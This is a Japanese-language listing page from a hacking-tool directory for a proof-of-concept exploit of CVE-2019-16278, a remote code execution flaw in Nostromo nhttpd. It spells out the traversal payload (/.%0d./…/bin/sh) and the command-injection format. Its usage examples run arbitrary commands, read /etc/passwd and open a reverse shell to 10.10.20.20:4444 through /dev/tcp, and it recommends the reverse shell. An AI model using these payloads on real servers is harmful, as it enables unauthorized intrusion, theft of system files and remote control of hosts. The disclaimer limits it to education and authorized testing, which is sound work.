Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-16278 — Nostromo nhttpd 1.9.6以下向けPoC RCEエクスプロイト | Kitploit
ツール/GitHubGitHub/andknownmaly/cve-2019-16278
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

Nostromo nhttpd 1.9.6以下向けPoC RCEエクスプロイト

リポジトリを見る
39ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-16278 - Nostromo nhttpd RCE

脆弱性の説明

Nostromo nhttpd バージョン 1.9.6 以前における、HTTPリクエスト処理内のディレクトリトラバーサルを利用したリモートコード実行の脆弱性。

影響を受けるバージョン

  • Nostromo nhttpd 1.9.6 以前

エクスプロイトの詳細

このエクスプロイトは、URLエンコードされたCRLF文字(%0d)を使用してディレクトリトラバーサル脆弱性を悪用し、/bin/shにアクセスして任意のコマンドを実行します。

動作の仕組み:

  1. パストラバーサルを含むPOSTリクエストを送信:/.%0d./.%0d./.%0d./.%0d./bin/sh
  2. Content-Length ヘッダーを使用してペイロードサイズを制御
  3. シェルリダイレクションを介してコマンドを実行:echo\necho\n<command> 2>&1

使用方法

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

例:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

リバースシェル推奨、時々スクリプトが何も表示しないことがあります

必要条件

  • Python 3
  • ターゲットサーバーへのネットワークアクセス
  • 脆弱なNostromo nhttpdが動作しているターゲット

参考文献

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

免責事項

このツールは教育目的および許可されたセキュリティテストのみを対象としています。コンピュータシステムへの不正アクセスは違法です。

ツールをダウンロード